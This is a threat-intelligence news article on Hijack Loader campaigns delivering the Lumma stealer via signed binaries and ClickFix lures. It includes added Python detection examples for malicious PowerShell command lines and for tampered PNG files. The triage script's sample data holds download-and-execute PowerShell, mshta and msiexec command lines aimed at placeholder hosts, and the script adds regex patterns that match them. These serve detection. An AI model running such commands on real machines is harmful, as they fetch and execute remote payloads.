
Cybersecurity researchers have disclosed a new malware campaign that delivers Hijack Loader artifacts that are signed with legitimate code-signing certificates.

French cybersecurity company HarfangLab, which detected the activity at the start of the month, said the attack chains aim to deploy an information stealer known as Lumma.

Hijack Loader, also known as DOILoader, IDAT Loader, and SHADOWLADDER, first came to light in September 2023. Attack chains involving the malware loader typically involve tricking users into downloading a booby-trapped binary under the guise of pirated software or movies.

Recent variations of these campaigns have been found to direct users to fake CAPTCHA pages that urge site visitors to prove they are human by copying and running an encoded PowerShell command that drops the malicious payload in the form of a ZIP archive.


HarfangLab said it observed three different versions of the PowerShell script starting in mid-September 2024:

  • A PowerShell script that leverages mshta.exe to execute code hosted on a remote server
  • A remotely-hosted PowerShell script that's directly executed via the Invoke-Expression cmdlet (aka iex)
  • A PowerShell script that employs msiexec.exe to download and execute a payload from a remote URL
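The three variants above (and the copy-and-run CAPTCHA lure that delivers them) all leave a recognisable process command line behind. The following is an added example, not code from HarfangLab or from the campaign, of how a defender can triage Sysmon Event ID 1 / Security 4688 command-line fields for those patterns. The rule names, the regular expressions and the sample command lines are all constructed for this example; the hosts use the reserved `.invalid` domain and are not indicators.

```python
"""Triage of process command lines for the three PowerShell delivery patterns
described above: mshta fetching remote content, a remote script run via iex,
and msiexec installing from a remote URL. Added example with constructed data."""
import base64
import re

# Hypothetical rule names, each paired with a regex over a single command line.
RULES = {
    "mshta_remote": re.compile(r"\bmshta(?:\.exe)?\s+\S*https?://", re.I),
    "iex_remote": re.compile(
        r"\b(?:iex|invoke-expression)\b.*?"
        r"(?:downloadstring|invoke-restmethod|\birm\b|invoke-webrequest|\biwr\b|https?://)",
        re.I,
    ),
    "msiexec_remote": re.compile(r"\bmsiexec(?:\.exe)?\b.*?/i\s+https?://", re.I),
}
# -EncodedCommand (and its short forms) carries base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_powershell(cmd: str) -> str:
    """Produce the -EncodedCommand form; used here only to construct a sample line."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload if present and well-formed, else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Classify one command line; an encoded command is decoded before the rules run."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    if decoded is not None:
        hits.append("encoded_command")
    return {"cmdline": cmdline, "decoded": decoded, "hits": sorted(hits)}


def flagged(cmdlines) -> list:
    """Return triage results for every command line that matched at least one rule."""
    return [r for r in map(triage, cmdlines) if r["hits"]]


# Constructed sample command lines in the shape of Sysmon Event ID 1 CommandLine
# fields. The last one is benign and should not be flagged.
SAMPLE_CMDLINES = [
    'powershell.exe -w hidden -c "mshta.exe http://example.invalid/page.hta"',
    'powershell.exe -NoP -c "iex (New-Object Net.WebClient).DownloadString(\'https://example.invalid/x.ps1\')"',
    'powershell.exe -c "msiexec.exe /i https://example.invalid/pkg.msi /qn"',
    "powershell.exe -EncodedCommand " + encode_powershell("iex (irm https://example.invalid/x.ps1)"),
    'powershell.exe -c "Get-ChildItem C:\\Users"',
]

if __name__ == "__main__":
    for result in flagged(SAMPLE_CMDLINES):
        print(result["hits"], "<-", result["decoded"] or result["cmdline"])
```

Decoding `-EncodedCommand` before matching matters because the lure in these campaigns hands the user an encoded command; matching only on the raw field would miss it. The regexes are deliberately narrow (a remote URL must be present), so a local `msiexec /i` or an interactive `iex` of a local variable does not fire; tune them to your environment's baseline before deploying.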

The ZIP archive, for its part, includes a genuine executable that's susceptible to DLL side-loading and the malicious DLL (i.e., Hijack Loader) that's to be loaded instead.

"The purpose of the sideloaded HijackLoader DLL is to decrypt and execute an encrypted file which is provided in the package," HarfangLab said. "This file conceals the final HijackLoader stage, which is aimed at downloading and executing a stealer implant."

The delivery mechanism is said to have changed from DLL side-loading to using several signed binaries in early October 2024 in an attempt to evade detection by security software.

It's currently not clear if all the code-signing certificates were stolen or intentionally generated by the threat actors themselves, although the cybersecurity firm assessed with low to medium confidence that it could be the latter. The certificates have since been revoked.

"For several issuing certificate authorities, we noticed that acquiring and activating a code-signing certificate is mostly automated, and only requires a valid company registration number as well as a contact person," it said. "This research underscores that malware can be signed, highlighting that code signature alone cannot serve as a baseline indicator of trustworthiness."

The development comes as SonicWall Capture Labs warned of a surge in cyber attacks infecting Windows machines with a malware dubbed CoreWarrior.

"This is a persistent trojan that attempts to spread rapidly by creating dozens of copies of itself and reaching out to multiple IP addresses, opening multiple sockets for backdoor access, and hooking Windows UI elements for monitoring," it said.


Phishing campaigns have also been observed delivering a commodity stealer and loader malware known as XWorm by means of a Windows Script File (WSF) that, in turn, downloads and executes a PowerShell script hosted on paste[.]ee.


The PowerShell script subsequently launches a Visual Basic Script, which acts as a conduit to execute a series of batch and PowerShell scripts to load a malicious DLL that's responsible for injecting XWorm into a legitimate process ("RegSvcs.exe").

The latest version of XWorm (version 5.6) includes the ability to report response time, collect screenshots, read and modify the victim's hosts file, perform a denial-of-service (DoS) attack against a target, and remove stored plugins, indicating an attempt to avoid leaving a forensic trail.

"XWorm is a multifaceted tool that can provide a wide range of functions to the attacker," Netskope Threat Labs security researcher Jan Michael Alcantara said.

Update

Elastic Security Labs, which is tracking Hijack Loader under the name GHOSTPULSE, said it observed new samples that come fitted with significant changes to its inner workings.

"In its earlier iterations, GHOSTPULSE abused the IDAT chunk of PNG files to hide malicious payloads," security researcher Salim Bitam said in an analysis published on October 19, 2024.

"Instead of extracting the payload from the IDAT chunk, the latest version of GHOSTPULSE now parses the pixels of the image to retrieve its configuration and payload. This new approach involves embedding malicious data directly within the pixel structure."
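The earlier GHOSTPULSE technique described above hides a payload inside a PNG's IDAT chunk, which leaves the file structurally inconsistent: the decompressed image data no longer matches the dimensions declared in IHDR. The following is an added example, not Elastic's code nor the loader's, of a structural check that flags that class of abuse, plus two cheap companions (chunk CRC validation and bytes trailing IEND). The sample PNGs are constructed inline, and the "tampered" one is just padding appended inside the IDAT stream; the check assumes non-interlaced images with 8- or 16-bit samples. The caveat the article's update implies: the newer pixel-embedding variant produces a structurally valid image, so this check will not catch it, and detection there has to come from the loader's behaviour rather than from the image file.

```python
"""Structural sanity checks on PNG files, targeting IDAT-chunk payload hiding.
Added example with constructed sample images; not from the original article."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # PNG colour type -> samples per pixel


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(width: int, height: int, rows, extra: bytes = b"") -> bytes:
    """Build a minimal 8-bit RGB PNG. `extra` is appended inside the IDAT stream
    and exists only to construct a tampered sample for this example."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"".join(b"\x00" + row for row in rows)  # filter type 0 on each scanline
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw + extra))
            + _chunk(b"IEND", b""))


def parse_chunks(data: bytes):
    """Walk the chunk list up to IEND; return [(type, body, crc_ok)] and trailing bytes."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        chunks.append((ctype, body, crc == (zlib.crc32(ctype + body) & 0xFFFFFFFF)))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def inspect_png(data: bytes) -> dict:
    """Compare decompressed IDAT size with what IHDR implies, check CRCs and trailing data."""
    chunks, trailing = parse_chunks(data)
    ihdr = next(c[1] for c in chunks if c[0] == b"IHDR")
    width, height, depth, ctype, _, _, interlace = struct.unpack(">IIBBBBB", ihdr)
    if interlace or depth < 8:
        raise NotImplementedError("example covers non-interlaced images with >=8-bit samples")
    # One filter byte per scanline plus the packed samples of that line.
    expected = height * (1 + width * CHANNELS[ctype] * depth // 8)
    idat = b"".join(c[1] for c in chunks if c[0] == b"IDAT")
    actual = len(zlib.decompress(idat))
    return {
        "crc_ok": all(c[2] for c in chunks),
        "expected_raw_len": expected,
        "actual_raw_len": actual,
        "idat_ok": actual == expected,
        "trailing_bytes": len(trailing),
    }


# Constructed 2x2 RGB samples: a clean image and one with padding hidden in IDAT.
ROWS = [bytes([255, 0, 0, 0, 255, 0]), bytes([0, 0, 255, 255, 255, 255])]
CLEAN_PNG = build_png(2, 2, ROWS)
TAMPERED_PNG = build_png(2, 2, ROWS, extra=b"constructed placeholder payload bytes " * 8)

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_PNG), ("tampered", TAMPERED_PNG)):
        print(name, inspect_png(blob))
```

A viewer renders the tampered file normally because decoders stop once the declared scanlines are filled, which is exactly why the surplus goes unnoticed without a check like this. Running `inspect_png` over image files dropped next to a sideloaded DLL is cheap triage; an `idat_ok` of `False`, a CRC failure, or non-zero `trailing_bytes` is worth a closer look.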

The attack chain leverages an increasingly prevalent social engineering tactic dubbed ClickFix to entice users into manually copying a PowerShell script, pasting it into a terminal and executing it, thus triggering the deployment of the malware loader.
